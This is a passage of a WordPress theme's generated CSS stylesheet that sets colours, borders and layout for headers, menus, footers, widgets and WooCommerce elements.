#grve-header.grve-header-sticky .grve-menu-button-line { background-color: #3C3A35; } /* Sticky Simply Menu Type */ #grve-header[data-menu-type='simply'].grve-header-sticky #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='simply'].grve-header-sticky #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='simply'].grve-header-sticky #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='simply'].grve-header-sticky #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='simply'].grve-header-sticky #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='simply'].grve-header-sticky #grve-main-menu > ul > li:hover > a, #grve-header[data-menu-type='simply'].grve-header-sticky #grve-main-menu > ul > li.current-menu-ancestor > a, #grve-header.grve-header-sticky .grve-menu-options li a:hover { color: #ff6863; } /* Sticky Button Menu Type */ #grve-header[data-menu-type='button'].grve-header-sticky #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='button'].grve-header-sticky #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='button'].grve-header-sticky #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='button'].grve-header-sticky #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='button'].grve-header-sticky #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='button'].grve-header-sticky #grve-main-menu > ul > li:hover > a, #grve-header.grve-header-sticky .grve-menu-options li a .grve-purchased-items { color: #ffffff; background-color: #ff6863; } /* Sticky Box Menu Type */ #grve-header[data-menu-type='box'].grve-header-sticky #grve-main-menu > ul > li.current-menu-item > a, #grve-header[data-menu-type='box'].grve-header-sticky #grve-main-menu > ul > li.current-menu-parent > a, #grve-header[data-menu-type='box'].grve-header-sticky #grve-main-menu > ul > li.current_page_item > a, #grve-header[data-menu-type='box'].grve-header-sticky #grve-main-menu > ul > li.current_page_ancestor > a, #grve-header[data-menu-type='box'].grve-header-sticky #grve-main-menu > ul > li.active > a, #grve-header[data-menu-type='box'].grve-header-sticky #grve-main-menu > ul > li:hover > a { color: #ffffff; background-color: #ff6863; } /* Sticky Submenu Colors */ #grve-header.grve-header-sticky #grve-main-menu ul li ul a, #grve-header.grve-header-sticky #grve-header-options ul.grve-options a, #grve-header.grve-header-sticky #grve-main-menu ul li a:hover .label, #grve-header.grve-header-sticky #grve-main-menu > ul > li.megamenu > ul > li > a:hover, #grve-header.grve-header-sticky #grve-main-menu > ul > li.megamenu > ul { color: #808080; background-color: #222222; } #grve-header.grve-header-sticky #grve-main-menu ul li.current-menu-item > a, #grve-header.grve-header-sticky #grve-main-menu > ul > li.megamenu > ul > li > a { color: #ffffff; } #grve-header.grve-header-sticky #grve-main-menu > ul > li.megamenu > ul > li, #grve-header.grve-header-sticky #grve-main-menu ul li.divider { color: #808080; } #grve-header.grve-header-sticky #grve-main-menu ul li ul a:hover, #grve-header.grve-header-sticky #grve-header-options ul.grve-options a:hover, #grve-header.grve-header-sticky #grve-main-menu ul li a .label { color: #ffffff; background-color: #ff6863; } #grve-header.grve-header-sticky #grve-main-menu > ul > li.megamenu > ul > li { border-color: #4f4f4f; } #grve-header.grve-header-sticky #grve-header-options > li > a.grve-open-button { color: #ff6863; background-color: rgba(25,25,24,0); } #grve-header.grve-header-sticky #grve-header-options > li:hover > a.grve-open-button { color: #ffffff; background-color: rgba(34,34,34,0); } #grve-header[data-logo-background='colored'].grve-default .grve-logo, #grve-header[data-logo-background='advanced'].grve-default .grve-logo { background-color: #ff6863; } #grve-header.grve-default .grve-logo a.grve-dark, #grve-header.grve-default .grve-logo a.grve-light, #grve-header.grve-default .grve-logo a.grve-sticky { display: none; } #grve-header[data-logo-background='colored'].grve-light .grve-logo, #grve-header[data-logo-background='advanced'].grve-light .grve-logo { background-color: #ff6863; } #grve-header[data-logo-background='colored'].grve-dark .grve-logo, #grve-header[data-logo-background='advanced'].grve-dark .grve-logo { background-color: #ff6863; } #grve-header[data-logo-background='colored'].grve-header-sticky .grve-logo, #grve-header[data-logo-background='advanced'].grve-header-sticky .grve-logo { background-color: #ff6863; } #grve-page-title, #grve-main-content.grve-error-404 { background-color: #303030; } #grve-portfolio-title { background-color: #303030; } #grve-page-title.grve-blog-title { background-color: #303030; } #grve-post-title { background-color: #303030; } #grve-product-title.grve-product-tax-title { background-color: #303030; } #grve-product-title { background-color: #303030; } #grve-anchor-menu { height: 70px; line-height: 70px; } #grve-anchor-menu, #grve-anchor-menu.grve-responsive-bar ul li, #grve-anchor-menu ul li ul { background-color: #252525; } #grve-anchor-menu ul li a { color: #B2B2B2; background-color: transparent; } #grve-anchor-menu ul li.current-menu-item a, #grve-anchor-menu ul li a:hover, #grve-anchor-menu ul li.primary-button a, #grve-anchor-menu ul li.current > a { color: #ffffff; background-color: #ff6863; } #grve-anchor-menu ul li, #grve-anchor-menu ul li ul li, #grve-anchor-menu.grve-responsive-bar ul li, #grve-anchor-menu.grve-responsive-bar ul li ul, #grve-anchor-menu.grve-incontainer > ul > li:first-child { border-color: #303030; } #grve-meta-bar { height: 70px; line-height: 70px; } #grve-meta-bar { background-color: #252525; } #grve-meta-bar ul li, #grve-meta-bar ul li a, #grve-post-title #grve-social-share.in-bar ul li a { color: #B2B2B2 !important; background-color: transparent !important; } #grve-meta-bar ul li.current-menu-item a, #grve-meta-bar ul li a:hover, #grve-post-title #grve-social-share.in-bar ul li a:hover { color: #ffffff !important; background-color: #468ac8 !important; } #grve-meta-bar ul.grve-post-nav li a { width: 70px; } #grve-meta-bar ul li, #grve-post-title #grve-social-share.in-bar ul li a { border-color: #303030 !important; } #grve-portfolio-bar { background-color: #252525; } #grve-portfolio-bar ul li a, #grve-portfolio-bar #grve-social-share ul li .grve-like-counter { color: #B2B2B2; background-color: transparent; } #grve-portfolio-bar ul li a:hover { color: #ffffff; background-color: #ff6863; } #grve-portfolio-bar ul li, #grve-portfolio-bar #grve-social-share ul li a { border-color: #303030; } .grve-breadcrumbs { background-color: #ffffff; border-color: #e0e0e0; } .grve-breadcrumbs ul li { color: #b2b2b2; } .grve-breadcrumbs ul li a { color: #6e6e6e; } .grve-breadcrumbs ul li a:hover { color: #f1b144; } #grve-page-breadcrumbs { line-height: 60px; } #grve-post-breadcrumbs { line-height: 45px; } #grve-portfolio-breadcrumbs { line-height: 60px; } #grve-product-breadcrumbs { line-height: 60px; } #grve-main-content { background-color: #ffffff; } a { color: #ff6863; } a:hover { color: #FF4441; } #grve-above-footer { background-color: #303030; } #grve-above-footer .grve-social li a, #grve-above-footer .grve-social li:after { color: #ffffff; } #grve-above-footer .grve-social li a:hover { color: #ff6863; } #grve-above-footer .grve-newsletter { color: #ffffff; } #grve-above-footer .grve-newsletter input[type='submit'] { background-color: #ff6863; color: #ffffff; } #grve-above-footer .grve-newsletter input[type='submit']:hover { background-color: #2d2c29; color: #ff6863; } #grve-footer-area { background-color: #252525; } /* Widget Title Color */ #grve-footer-area h1, #grve-footer-area h2, #grve-footer-area h3, #grve-footer-area h4, #grve-footer-area h5, #grve-footer-area h6, #grve-footer-area .grve-widget-title, #grve-footer-area .widget.widget_recent_entries li span.post-date, #grve-footer-area .widget.widget_rss .grve-widget-title a { color: #ffffff; } /* Footer Text Color */ #grve-footer-area, #grve-footer-area .widget.widget_tag_cloud a{ color: #a0a0a0; } #grve-footer-area a, #grve-footer-area .widget li a { color: #a0a0a0; } /* Footer Text Hover Color */ #grve-footer-area a:hover, #grve-footer-area .widget li a:hover { color: #ff6863; } #grve-footer-area input, #grve-footer-area input[type='text'], #grve-footer-area input[type='input'], #grve-footer-area input[type='password'], #grve-footer-area input[type='email'], #grve-footer-area input[type='number'], #grve-footer-area input[type='date'], #grve-footer-area input[type='url'], #grve-footer-area input[type='tel'], #grve-footer-area input[type='search'], #grve-footer-area .grve-search button[type='submit'], #grve-footer-area textarea, #grve-footer-area select, #grve-footer-area .widget.widget_calendar table th, #grve-footer-area .grve-widget.grve-social li a, #grve-footer-area .widget.widget_tag_cloud a { border-color: #444444; } #grve-footer-bar { background-color: rgba(34,34,34,1); color: #7a7a7a; } #grve-footer-bar a, #grve-footer-bar #grve-second-menu li a, #grve-footer-bar .grve-social li a, #grve-footer-bar .grve-social li:after { color: #7a7a7a; } #grve-footer-bar a:hover, #grve-footer-bar #grve-second-menu li a:hover, #grve-footer-bar .grve-social li a:hover { color: #ff6863; } .grve-dark-overlay:before { background-color: #000000; } .grve-light-overlay:before { background-color: #ffffff; } .grve-primary-1-overlay:before { background-color: #ff6863; } .grve-primary-2-overlay:before { background-color: #8E8174; } .grve-primary-3-overlay:before { background-color: #86C8B7; } .grve-primary-4-overlay:before { background-color: #CDB3D8; } .grve-primary-5-overlay:before { background-color: #8CB6CF; } #grve-main-content, .grve-bg-light, #grve-main-content .grve-sidebar-colored.grve-bg-light a, #grve-anchor-menu, #grve-main-content .grve-post-author a, #grve-main-content .widget.widget_categories li a, #grve-main-content .widget.widget_pages li a, #grve-main-content .widget.widget_archive li a, #grve-main-content .widget.widget_nav_menu li a, #grve-main-content .widget.widget_tag_cloud a, #grve-main-content .widget.widget_meta a, #grve-main-content .widget.widget_recent_entries a, #grve-main-content .widget.widget_recent_comments a.url, #grve-main-content .grve-widget.grve-comments a.url, #grve-main-content .grve-widget.grve-latest-news a, #grve-social-share-responsive ul li a, #grve-main-content .grve-widget.grve-social li a, .grve-tags li a, .grve-categories li a, #grve-comments .grve-comment-item .grve-comment-date a:hover, .grve-pagination ul li a, .grve-filter ul li:after, input[type='text'], input[type='input'], input[type='password'], input[type='email'], input[type='number'], input[type='date'], input[type='url'], input[type='tel'], input[type='search'], textarea, select, #grve-meta-responsive ul li a, .grve-map-infotext p, #grve-main-content .grve-portfolio .grve-light.grve-caption, #grve-main-content .grve-grve-gallery .grve-light.grve-caption, #grve-main-content .grve-image-hover .grve-light.grve-team-identity, .grve-team .grve-team-social li a, .grve-comment-nav ul li a, .grve-pagination ul li:after, .grve-search button[type='submit'] .grve-icon-search, .grve-top-btn, .woocommerce nav.woocommerce-pagination ul li a, .woocommerce nav.woocommerce-pagination ul li span, .woocommerce #content nav.woocommerce-pagination ul li a, .woocommerce #content nav.woocommerce-pagination ul li span, .woocommerce-page nav.woocommerce-pagination ul li a, .woocommerce-page nav.woocommerce-pagination ul li span, .woocommerce-page #content nav.woocommerce-pagination ul li a, .woocommerce-page #content nav.woocommerce-pagination ul li span, .woocommerce ul.products li.product .price, .woocommerce-page ul.products li.product .price, .woocommerce-page .star-rating span:before, .woocommerce-page .woocommerce-product-rating a, .woocommerce div.product .woocommerce-tabs ul.tabs li a, .woocommerce #content div.product .woocommerce-tabs ul.tabs li a, .woocommerce-page div.product .woocommerce-tabs ul.tabs li a, .woocommerce-page #content div.product .woocommerce-tabs ul.tabs li a, ul.product-categories li a, .woocommerce.widget_product_tag_cloud .tagcloud a, .product_meta a, .grve-testimonial-grid.grve-border-mode .grve-isotope-item-inner { color: #6e7177; } .grve-testimonial .owl-controls .owl-page span { background-color: #6e7177; } .grve-iso-spinner svg path { fill: #6e7177; } #grve-main-content h1, #grve-main-content h2, #grve-main-content h3, #grve-main-content h4, #grve-main-content h5, #grve-main-content h6, #grve-main-content .grve-post-title, .grve-blog .grve-read-more, #grve-main-content .more-link, #grve-main-content .widget.widget_rss cite, #grve-main-content .widget.widget_rss .grve-widget-title a, #grve-main-content .widget.widget_recent_comments a:hover, #grve-main-content .grve-widget.grve-comments a:hover, #grve-main-content .widget.widget_recent_entries li span.post-date, #grve-main-content .grve-widget.grve-comments .grve-comment-date, #grve-main-content .grve-widget.grve-latest-news .grve-latest-news-date, .widget.widget_calendar table th, .grve-tags li:first-child, .grve-categories li:first-child, #grve-comments .comment-reply-link:hover, #grve-comments .grve-comment-item .grve-author a, #grve-comments .comment-edit-link, #respond .comment-reply-title small a:hover, #respond .comment-notes, #grve-main-content .grve-read-more:hover, #grve-main-content .more-link:hover, .grve-label-post.format-quote .grve-post-meta .grve-like-counter span, #grve-share-modal .grve-social li a, #grve-language-modal .grve-language li a, .grve-accordion .grve-title.active, .grve-toggle .grve-title.active, #grve-meta-responsive ul li span, input[type='text']:hover, input[type='input']:hover, input[type='password']:hover, input[type='email']:hover, input[type='number']:hover, input[type='date']:hover, input[type='url']:hover, input[type='tel']:hover, input[type='search']:hover, textarea:hover, select:hover, input[type='text']:focus, input[type='password']:focus, input[type='email']:focus, input[type='number']:focus, input[type='date']:focus, input[type='url']:focus, input[type='tel']:focus, input[type='search']:focus, textarea:focus, #grve-main-content .grve-portfolio .grve-light.grve-title, #grve-main-content .grve-grve-gallery .grve-light.grve-title, #grve-main-content .grve-image-hover.grve-style-1 .grve-light.grve-team-name, .grve-related-wrapper small, .grve-product-name a, .woocommerce table.shop_table th, .woocommerce-page table.shop_table th, .woocommerce ul.cart_list li a, .woocommerce ul.product_list_widget li a, .woocommerce-page ul.cart_list li a, .woocommerce-page ul.product_list_widget li a, .product_meta { color: #454545; } #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_categories li a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_pages li a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_archive li a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_nav_menu li a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_tag_cloud a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_meta a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_recent_entries a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_recent_comments a.url:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .grve-widget.grve-comments a.url:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .grve-widget.grve-latest-news a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .grve-widget.grve-social li a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_rss .grve-widget-title a:hover, #grve-main-content .grve-sidebar-colored.grve-bg-primary-1 .widget.widget_rss a { color: #000000 !important; } .grve-color-primary-1, .grve-color-primary-1:before, .grve-color-primary-1:after, #grve-main-content .grve-primary-1 h1, #grve-main-content .grve-primary-1 h2, #grve-main-content .grve-primary-1 h3, #grve-main-content .grve-primary-1 h4, #grve-main-content .grve-primary-1 h5, #grve-main-content .grve-primary-1 h6, #grve-meta-responsive li a:hover, #grve-feature-section .grve-title.grve-primary-1, #grve-page-title .grve-title.grve-primary-1, #grve-post-title .grve-title.grve-primary-1, #grve-portfolio-title .grve-title.grve-primary-1, #grve-product-title .grve-title.grve-primary-1, .grve-portfolio .grve-primary-1 .grve-like-counter, #grve-feature-section .grve-goto-section.grve-primary-1, ul.grve-fields li:before, .widget.widget_calendar a, #grve-main-content .grve-post-title:hover, #grve-main-content .grve-post-author a:hover, .grve-blog.grve-isotope[data-type='pint-blog'] .grve-isotope-item .grve-media-content .grve-post-icon, .grve-blog.grve-isotope[data-type='pint-blog'] .grve-isotope-item.grve-label-post.format-quote a .grve-post-icon:before, #grve-main-content .widget.widget_categories li a:hover, #grve-main-content .widget.widget_archive li a:hover, #grve-main-content .widget.widget_pages li a:hover, #grve-main-content .widget.widget_nav_menu li a:hover, #grve-main-content .widget.widget_nav_menu li.current-menu-item a, #grve-main-content .widget li .rsswidget, #grve-main-content .widget.widget_recent_comments a.url:hover, #grve-main-content .widget.widget_recent_comments a, #grve-main-content .grve-widget.grve-comments a.url:hover, #grve-main-content .grve-widget.grve-comments a, #grve-main-content .widget.widget_meta a:hover, #grve-main-content .widget.widget_recent_entries a:hover, #grve-main-content .widget.grve-contact-info a, #grve-main-content .grve-widget.grve-latest-news a:hover, .grve-tags li a:hover, .grve-categories li a:hover, #grve-main-content .grve-read-more, #grve-main-content .more-link, #grve-comments .comment-reply-link, #grve-comments .grve-comment-item .grve-author a:hover, #grve-comments .grve-comment-item .grve-comment-date a, #grve-comments .comment-edit-link:hover, #respond .comment-reply-title small a, .grve-blog .grve-like-counter span, .grve-pagination ul li a.current, .grve-pagination ul li a:hover, .grve-accordion .grve-title.active:before, .grve-toggle .grve-title.active:before, .grve-filter ul li.selected, .grve-portfolio-item .grve-portfolio-btns li a:hover, #grve-main-content figure.grve-style-1 .grve-team-social li a:hover, #grve-main-content figure.grve-style-2 .grve-team-social li a:hover, #grve-main-content .grve-team a:hover .grve-team-name.grve-dark, #grve-main-content .grve-team a:hover .grve-team-name, .grve-hr .grve-divider-backtotop:after, .grve-testimonial-name span, .grve-testimonial-name:before, .grve-list li:before, #grve-feature-section .grve-description.grve-primary-1, #grve-page-title .grve-description.grve-primary-1, #grve-portfolio-title .grve-description.grve-primary-1, .grve-carousel-wrapper .grve-custom-title-content.grve-primary-1 .grve-caption, .grve-comment-nav ul li a:hover, .grve-pagination ul li .current, .grve-search button[type='submit']:hover .grve-icon-search, .grve-product-item .star-rating span:before, .woocommerce nav.woocommerce-pagination ul li span.current, .woocommerce nav.woocommerce-pagination ul li a:hover, .woocommerce nav.woocommerce-pagination ul li a:focus, .woocommerce #content nav.woocommerce-pagination ul li span.current, .woocommerce #content nav.woocommerce-pagination ul li a:hover, .woocommerce #content nav.woocommerce-pagination ul li a:focus, .woocommerce-page nav.woocommerce-pagination ul li span.current, .woocommerce-page nav.woocommerce-pagination ul li a:hover, .woocommerce-page nav.woocommerce-pagination ul li a:focus, .woocommerce-page #content nav.woocommerce-pagination ul li span.current, .woocommerce-page #content nav.woocommerce-pagination ul li a:hover, .woocommerce-page #content nav.woocommerce-pagination ul li a:focus, .woocommerce table.cart a.remove:hover, .woocommerce #content table.cart a.remove:hover, .woocommerce-page table.cart a.remove:hover, .woocommerce-page #content table.cart a.remove:hover, .woocommerce-page div.product p.price, .woocommerce-page .single_variation, .woocommerce-page tr.order-total td, .woocommerce-checkout .product-quantity, .woocommerce .widget_price_filter .price_slider_amount span.from, .woocommerce-page .widget_price_filter .price_slider_amount span.from, .woocommerce .widget_price_filter .price_slider_amount span.to, .woocommerce-page .widget_price_filter .price_slider_amount span.to, .woocommerce ul.cart_list li a:hover, .woocommerce ul.product_list_widget li a:hover, .woocommerce-page ul.cart_list li a:hover, .woocommerce-page ul.product_list_widget li a:hover, ul.product-categories li a:hover, .woocommerce.widget_product_tag_cloud .tagcloud a:hover, .product_meta a:hover, .woocommerce div.product .woocommerce-tabs ul.tabs li.active a, .woocommerce #content div.product .woocommerce-tabs ul.tabs li.active a, .woocommerce-page div.product .woocommerce-tabs ul.tabs li.active a, .woocommerce-page #content div.product .woocommerce-tabs ul.tabs li.active a, .woocommerce-MyAccount-navigation ul li a:hover { color: #ff6863; } .grve-color-primary-2, .grve-color-primary-2:before, .grve-color-primary-2:after, #grve-main-content .grve-primary-2 h1, #grve-main-content .grve-primary-2 h2, #grve-main-content .grve-primary-2 h3, #grve-main-content .grve-primary-2 h4, #grve-main-content .grve-primary-2 h5, #grve-main-content .grve-primary-2 h6, #grve-feature-section .grve-title.grve-primary-2, #grve-feature-section .grve-goto-section.grve-primary-2, #grve-page-title .grve-title.grve-primary-2, #grve-post-title .grve-title.grve-primary-2, #grve-portfolio-title .grve-title.grve-primary-2, .grve-portfolio .grve-primary-2 .grve-like-counter, #grve-product-title .grve-title.grve-primary-2, .grve-blog.grve-isotope[data-type='pint-blog'] .grve-isotope-item.grve-label-post.format-link a .grve-post-icon:before, #grve-feature-section .grve-description.grve-primary-2, #grve-page-title .grve-description.grve-primary-2, #grve-portfolio-title .grve-description.grve-primary-2, .grve-carousel-wrapper .grve-custom-title-content.grve-primary-2 .grve-caption { color: #8E8174; } .grve-color-primary-3, .grve-color-primary-3:before, .grve-color-primary-3:after, #grve-main-content .grve-primary-3 h1, #grve-main-content .grve-primary-3 h2, #grve-main-content .grve-primary-3 h3, #grve-main-content .grve-primary-3 h4, #grve-main-content .grve-primary-3 h5, #grve-main-content .grve-primary-3 h6, #grve-feature-section .grve-title.grve-primary-3, #grve-feature-section .grve-goto-section.grve-primary-3, #grve-page-title .grve-title.grve-primary-3, #grve-post-title .grve-title.grve-primary-3, #grve-portfolio-title .grve-title.grve-primary-3, .grve-portfolio .grve-primary-3 .grve-like-counter, #grve-product-title .grve-title.grve-primary-3, #grve-feature-section .grve-description.grve-primary-3, #grve-page-title .grve-description.grve-primary-3, #grve-portfolio-title .grve-description.grve-primary-3, .grve-carousel-wrapper .grve-custom-title-content.grve-primary-3 .grve-caption { color: #86C8B7; } .grve-color-primary-4, .grve-color-primary-4:before, .grve-color-primary-4:after, #grve-main-content .grve-primary-4 h1, #grve-main-content .grve-primary-4 h2, #grve-main-content .grve-primary-4 h3, #grve-main-content .grve-primary-4 h4, #grve-main-content .grve-primary-4 h5, #grve-main-content .grve-primary-4 h6, #grve-feature-section .grve-title.grve-primary-4, #grve-feature-section .grve-goto-section.grve-primary-4, #grve-page-title .grve-title.grve-primary-4, #grve-post-title .grve-title.grve-primary-4, #grve-portfolio-title .grve-title.grve-primary-4, .grve-portfolio .grve-primary-4 .grve-like-counter, #grve-product-title .grve-title.grve-primary-4, #grve-feature-section .grve-description.grve-primary-4, #grve-page-title .grve-description.grve-primary-4, #grve-portfolio-title .grve-description.grve-primary-4, .grve-carousel-wrapper .grve-custom-title-content.grve-primary-4 .grve-caption { color: #CDB3D8; } .grve-color-primary-5, .grve-color-primary-5:before, .grve-color-primary-5:after, #grve-main-content .grve-primary-5 h1, #grve-main-content .grve-primary-5 h2, #grve-main-content .grve-primary-5 h3, #grve-main-content .grve-primary-5 h4, #grve-main-content .grve-primary-5 h5, #grve-main-content .grve-primary-5 h6, #grve-feature-section .grve-title.grve-primary-5, #grve-feature-section .grve-goto-section.grve-primary-5, #grve-page-title .grve-title.grve-primary-5, #grve-post-title .grve-title.grve-primary-5, #grve-portfolio-title .grve-title.grve-primary-5, .grve-portfolio .grve-primary-5 .grve-like-counter, #grve-product-title .grve-title.grve-primary-5, #grve-feature-section .grve-description.grve-primary-5, #grve-page-title .grve-description.grve-primary-5, #grve-portfolio-title .grve-description.grve-primary-5, .grve-carousel-wrapper .grve-custom-title-content.grve-primary-5 .grve-caption { color: #8CB6CF; } #grve-main-content .grve-dark h1, #grve-main-content .grve-dark h2, #grve-main-content .grve-dark h3, #grve-main-content .grve-dark h4, #grve-main-content .grve-dark h5, #grve-main-content .grve-dark h6, .grve-carousel-wrapper .grve-custom-title-content.grve-dark .grve-caption { color: #000000; } #grve-main-content .grve-light h1, #grve-main-content .grve-light h2, #grve-main-content .grve-light h3, #grve-main-content .grve-light h4, #grve-main-content .grve-light h5, #grve-main-content .grve-light h6, .grve-carousel-wrapper .grve-custom-title-content.grve-light .grve-caption { color: #ffffff; } #grve-tags-categories, #grve-about-author, #grve-comments, #grve-comments .grve-comment-item, #grve-comments .children:before, #grve-comments .children article.comment, #grve-main-content .widget.widget_tag_cloud a, #grve-meta-social-responsive, #grve-main-content .grve-widget.grve-social li a, #grve-post-area article.grve-single-post, #respond, .grve-related-wrapper small, #respond input[type='text'], #respond textarea, .grve-blog.grve-large-media .grve-blog-item, .grve-blog.grve-small-media .grve-blog-item, .grve-newsletter-form input[type='email'], .grve-search input[type='text'], #grve-share-modal .grve-social li a, #grve-social-share-responsive ul li a, #grve-language-modal .grve-language li a, .grve-accordion-wrapper li, .grve-toggle-wrapper li, .grve-bar, .grve-pricing-table, .grve-pricing-table ul li, #grve-main-content .widget.widget_tag_cloud a, #grve-main-content table, #grve-main-content tr, #grve-main-content td, #grve-main-content th, pre, hr, .grve-hr.grve-element, .grve-title-double-line span:before, .grve-title-double-line span:after, .grve-title-double-bottom-line span:after, #grve-main-content input, #grve-main-content input[type='text'], #grve-main-content input[type='input'], #grve-main-content input[type='password'], #grve-main-content input[type='email'], #grve-main-content input[type='number'], #grve-main-content input[type='date'], #grve-main-content input[type='url'], #grve-main-content input[type='tel'], #grve-main-content input[type='search'], .grve-search button[type='submit'], #grve-main-content textarea, #grve-main-content select, #grve-newsletter-modal input, #grve-newsletter-modal input[type='text'], #grve-newsletter-modal input[type='input'], #grve-newsletter-modal input[type='password'], #grve-newsletter-modal input[type='email'], #grve-newsletter-modal input[type='number'], #grve-newsletter-modal input[type='date'], #grve-newsletter-modal input[type='url'], #grve-newsletter-modal input[type='tel'], #grve-newsletter-modal input[type='search'], #grve-newsletter-modal textarea, #grve-newsletter-modal select, .grve-portfolio-description + ul.grve-fields, .grve-portfolio-info + .widget, .grve-related-post, .grve-carousel-wrapper .grve-post-item .grve-content, .grve-blog.grve-border-mode .grve-isotope-item-inner, .grve-blog.grve-border-mode .grve-read-more, .woocommerce .product_meta, #grve-shop-modal .cart_list.product_list_widget li, #grve-shop-modal .cart_list.product_list_widget, .grve-filter ul li, .woocommerce.widget_product_tag_cloud .tagcloud a, .woocommerce ul.products li .grve-product-item, .woocommerce-page ul.products li .grve-product-item, .woocommerce ul.products li .grve-product-item .grve-product-media, .woocommerce-page ul.products li .grve-product-item .grve-product-media, .woocommerce div.product .woocommerce-tabs ul.tabs, .woocommerce #content div.product .woocommerce-tabs ul.tabs, .woocommerce-page div.product .woocommerce-tabs ul.tabs, .woocommerce-page #content div.product .woocommerce-tabs ul.tabs, .woocommerce #content div.product .woocommerce-tabs, .woocommerce div.product .woocommerce-tabs, .woocommerce-page #content div.product .woocommerce-tabs, .woocommerce-page div.product .woocommerce-tabs, .grve-testimonial-grid.grve-border-mode .grve-isotope-item-inner { border-color: #e4e4e4; } .grve-bg-dark { background-color: #000000; color: #ffffff; } .grve-bg-light { background-color: #ffffff; } .grve-bg-primary-1, .grve-bar-line.grve-primary-1-color, #grve-header #grve-main-menu > ul > li.primary-button > a, #grve-feature-section .grve-style-4 .grve-title.grve-primary-1 span, .grve-tabs-title li.active, #grve-social-share-responsive ul li a:hover, #grve-share-modal .grve-social li a:hover, #grve-language-modal .grve-language li a:hover, #grve-language-modal .grve-language li a.active, #grve-main-content .grve-widget.grve-social li a:hover, #grve-footer-area .grve-widget.grve-social li a:hover, .grve-portfolio .grve-dark .grve-like-counter, .grve-portfolio .grve-light .grve-like-counter, #grve-feature-section .grve-style-1 .grve-title:after, #grve-feature-section .grve-style-4 .grve-title:before, #grve-feature-section .grve-style-4 .grve-title span:before, #grve-feature-section .grve-style-4 .grve-title:after, #grve-feature-section .grve-style-4 .grve-title span:after, .widget.widget_calendar caption, .grve-element.grve-social ul li a, #grve-post-title #grve-social-share.grve-primary-1 ul li a, .wpcf7-validation-errors, .grve-title-line span:after, blockquote:before, .grve-blog.grve-isotope[data-type='pint-blog'] .grve-isotope-item .grve-media-content .grve-read-more:before, .grve-blog.grve-isotope[data-type='pint-blog'] .grve-isotope-item .grve-media-content .more-link:before, .grve-blog .grve-label-post.format-quote a, input[type='submit'], input[type='reset'], button, .grve-testimonial .owl-controls .owl-page.active span, .grve-testimonial .owl-controls.clickable .owl-page:hover span, .grve-slider-item .grve-slider-content span:after, .grve-pricing-feature .grve-pricing-header, .grve-modal-content a.grve-close-modal, .woocommerce span.onsale, .woocommerce input.checkout-button, #grve-shop-modal a.button.checkout, .woocommerce .widget_price_filter .ui-slider .ui-slider-handle, .woocommerce-page .widget_price_filter .ui-slider .ui-slider-handle { background-color: #ff6863; color: #ffffff; } .grve-btn.grve-btn-line.grve-bg-primary-1 { color: #ff6863; border-color: #ff6863; } #grve-social-share-responsive ul li a:hover, #grve-main-content .grve-widget.grve-social li a:hover, #grve-footer-area .grve-widget.grve-social li a:hover, #grve-main-content .widget.widget_tag_cloud a:hover, #grve-footer-area .widget.widget_tag_cloud a:hover { border-color: #ff6863; } .grve-btn.grve-bg-primary-1:hover, .grve-tabs-title li:hover, #grve-header #grve-main-menu > ul > li.primary-button > a:hover, .grve-element.grve-social ul li a:hover, .grve-modal-content a.grve-close-modal:hover, #grve-post-title #grve-social-share.grve-primary-1 ul li a:hover { background-color: #FF4441; border-color: #FF4441; color: #ffffff; } /* Tagcloud Hover */ .widget.widget_tag_cloud a:hover, .woocommerce.widget_product_tag_cloud .tagcloud a:hover { border-color: #ff6863; background-color: #ff6863; color: #ffffff !important; } .grve-bg-primary-2, .grve-pricing-header, .grve-bar-line.grve-primary-2-color, #grve-feature-section .grve-style-4 .grve-title.grve-primary-2 span, .grve-blog .grve-label-post.format-link a, #grve-post-title #grve-social-share.grve-primary-2 ul li a { background-color: #8E8174; color: #ffffff; } .grve-btn.grve-btn-line.grve-bg-primary-2 { color: #8E8174; border-color: #8E8174; } .grve-btn.grve-bg-primary-2:hover, #grve-post-title #grve-social-share.grve-primary-2 ul li a:hover { background-color: #735D47; border-color: #735D47; color: #ffffff; } .grve-bg-primary-3, .grve-bar-line.grve-primary-3-color, #grve-feature-section .grve-style-4 .grve-title.grve-primary-3 span, #grve-post-title #grve-social-share.grve-primary-3 ul li a { background-color: #86C8B7; color: #ffffff; } .grve-btn.grve-btn-line.grve-bg-primary-3 { color: #86C8B7; border-color: #86C8B7; } .grve-btn.grve-bg-primary-3:hover, #grve-post-title #grve-social-share.grve-primary-3 ul li a:hover { background-color: #58b49c; border-color: #58b49c; color: #ffffff; } .grve-bg-primary-4, .grve-bar-line.grve-primary-4-color, #grve-feature-section .grve-style-4 .grve-title.grve-primary-4 span, #grve-post-title #grve-social-share.grve-primary-4 ul li a { background-color: #CDB3D8; color: #ffffff; } .grve-btn.grve-btn-line.grve-bg-primary-4 { color: #CDB3D8; border-color: #CDB3D8; } .grve-btn.grve-bg-primary-4:hover, #grve-post-title #grve-social-share.grve-primary-4 ul li a:hover { background-color: #BB8CCF; border-color: #BB8CCF; color: #ffffff; } 